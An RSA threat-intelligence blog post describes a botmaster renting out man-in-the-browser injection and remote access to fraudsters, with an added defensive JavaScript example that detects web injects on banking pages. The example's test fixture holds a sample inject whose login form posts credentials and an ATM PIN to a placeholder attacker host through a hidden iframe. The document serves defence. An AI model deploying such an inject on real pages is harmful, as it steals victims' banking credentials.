By Limor S Kessem, Cybercrime and Online Fraud Communications Specialist, RSA
Discussion and buzz about the burgeoning Fraud-as-a-Service (FaaS) trend in the cybercrime economy is as constant as it gets. New FaaS offerings are limited only by the imagination of the dubious actors who sell them, and as such they are often creative in the ways they make perpetrating fraud easier and more accessible to a growing number of criminals.
Among the most recent FaaS offerings RSA has noticed, it is notable to see the Citadel Trojan developers’ team instruct “crypters” to charge botmasters for their encryption services each time they supply a ‘crypt’ for a Citadel variant. This is a “pay-per-crypt” service, made possible by a malware development team that built a CRM system for its crimeware customers.
Another offer put a twist on an old FaaS staple, the sale of Internet traffic, with the added punch of cybercrime. Here, RSA’s FraudAction Research Lab analysts observed an offering best described as “Man-in-the-Middle for Hire”.
The offer came from a Russian-speaking cybercriminal peddling his services as the Man-in-the-Middle for wire-fraud schemes. What would normally be part of a botmaster’s daily work in Trojan-assisted fraudulent transactions is offered as an outsourced service to those who want to skip building and maintaining a botnet altogether. The service gives fraudsters direct access to victims without setting up any infrastructure of their own – via their very own Man-in-the-Middle.
The vendor is himself a botmaster, running a known banking Trojan that has a CAPTCHA-breaking module and is linked to exploit kits and to attacks via legitimate websites (particularly Facebook and other social networks). Apparently his botnet is large and diverse enough to be monetized by renting infected bots to the fraudsters who actually commit the crime.
How will this work? In the fraudster’s words: “I enter in the middle of the connection and add a code with frame to the target page”. What does that actually mean?
- The vendor operates a botnet in which different bots (infected machines) are located in different countries and belong to customers of different banks.
- A fraudster-customer contacts the vendor and asks to forward a specific injection to the infected bots in a given country or to the customers of a specific bank.
- The vendor, who controls the botnet and bots’ browsers through the Trojan, can inject the fraudster-customer’s script into the victim’s banking session and have the stolen credentials go directly to that fraudster.
- Since the vendor also provides a remote control component, he can allow the buyer to take control over the infected PC and attempt session hijacking or other fraud scenarios.
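The injection step in the list above, seen from the defender’s side, as an added example that is not code from this post or from any real fraud tool: a man-in-the-browser Trojan rewrites the banking page inside the victim’s browser, after TLS, so the server never sees the added frame, script or field. What a bank’s own client-side code can still do is compare the page as rendered with the page as served. The two HTML strings below are constructed for the demonstration, and the bank origin and the “collect.attacker.test” host are hypothetical names, not real infrastructure.

```javascript
// Added example, not code from the RSA post or from any real fraud tool.
// Compares a banking page as served with the same page as rendered after a
// hypothetical web inject, and reports what the server did not send.

const BANK_ORIGIN = "https://online.example-bank.test"; // assumed, not a real bank

// Page as the bank's server sent it (constructed for the demo).
const SERVED_HTML = `
<form id="login" action="/auth/login" method="post">
  <input name="username" type="text">
  <input name="password" type="password">
</form>
<script src="/static/app.js"></script>`;

// Same page after a hypothetical inject: the form now posts to the fraudster,
// an extra "ATM PIN" field was added, and a hidden frame loads the injector's
// code (all constructed; the attacker host is a placeholder).
const INJECTED_HTML = `
<form id="login" action="https://collect.attacker.test/drop" method="post">
  <input name="username" type="text">
  <input name="password" type="password">
  <input name="atm_pin" type="password">
</form>
<script src="/static/app.js"></script>
<iframe src="https://collect.attacker.test/frame" style="display:none"></iframe>`;

// Minimal tag scanner for the element types a web inject usually touches.
// A real deployment would walk the live DOM instead of parsing markup.
function extractElements(html) {
  const tagRe = /<(script|iframe|form|input)\b([^>]*)>/gi;
  const attrRe = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  const elements = [];
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const attrs = {};
    let attr;
    while ((attr = attrRe.exec(tag[2])) !== null) {
      attrs[attr[1].toLowerCase()] = attr[2] ?? attr[3] ?? attr[4];
    }
    elements.push({ tag: tag[1].toLowerCase(), attrs });
  }
  return elements;
}

// Resolve a possibly relative URL against the bank origin; null if unparsable.
function originOf(url, base) {
  try {
    return new URL(url, base).origin;
  } catch {
    return null;
  }
}

// Identity of an element for baseline comparison: tag plus the attribute that
// matters for that tag (script/iframe src, form action, input name).
function elementKey(e) {
  const ident = e.attrs.src ?? e.attrs.action ?? e.attrs.name ?? "";
  return `${e.tag}|${ident}`;
}

// Report every element on the rendered page that the server did not send,
// classified the way a fraud analyst would triage it.
function findInjections(servedHtml, renderedHtml, bankOrigin = BANK_ORIGIN) {
  const known = new Set(extractElements(servedHtml).map(elementKey));
  const findings = [];
  for (const e of extractElements(renderedHtml)) {
    if (known.has(elementKey(e))) continue;
    const url = e.attrs.src ?? e.attrs.action ?? null;
    const origin = url === null ? null : originOf(url, bankOrigin);
    if (e.tag === "script" || e.tag === "iframe") {
      // Inline or foreign: either way the server did not send it.
      findings.push({ kind: `foreign-${e.tag}`, url, sameOrigin: origin === bankOrigin });
    } else if (e.tag === "form") {
      findings.push({ kind: "form-action-changed", url, sameOrigin: origin === bankOrigin });
    } else {
      findings.push({ kind: "unexpected-input", name: e.attrs.name ?? null });
    }
  }
  return findings;
}

// Run the comparison on the constructed pages.
function runDemo() {
  return findInjections(SERVED_HTML, INJECTED_HTML);
}

console.log(JSON.stringify(runDemo(), null, 2));
```

The baseline has to come from somewhere the Trojan cannot rewrite, which is the weak point of any purely client-side check: in practice banks ship the expected element list signed from the server and also verify transactions out of band, since a vendor with remote control of the PC can defeat anything that runs only in the infected browser.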
The potential benefits of this service for less sophisticated fraudsters are a complete shortcut to targeted credential theft and a way to attempt fraudulent transactions from Trojan-infected machines – without ever owning a Trojan or operating a botnet.
The main drawback is the limited exclusivity of the bots, especially where customers of the larger banks are concerned, since those victims are in high demand; the service could still be lucrative for fraudsters who target credit unions or regional financial institutions that are less well known and in less demand.
This type of ‘service’ is part of the continuing Fraud-as-a-Service supply-chain trend in the black market, where tech-savvy operators offer their help and resources to the actual thieves who attempt to defraud accounts and cash them out.
Fortunately for security professionals, the mitigation methods for this attack are not affected, since the vendor is not offering a new attack method but rather a shortcut for those who plan to access victim PCs. The injection and the remote-control session are the same man-in-the-browser and remote-access techniques banks already defend against, so the established controls (out-of-band transaction verification, device and session anomaly detection, client-side page-integrity checks) apply unchanged. Similar results can be obtained by purchasing RDP access, which fraudsters have been doing for years; this offering tops that with custom injections and a live assistant.
Another side to this service offer is that the vendor himself has to be available in real time to those demanding his assistance – unlike MITB and automated scripts, hands-on fraud schemes are time-consuming and can only target one victim at a time.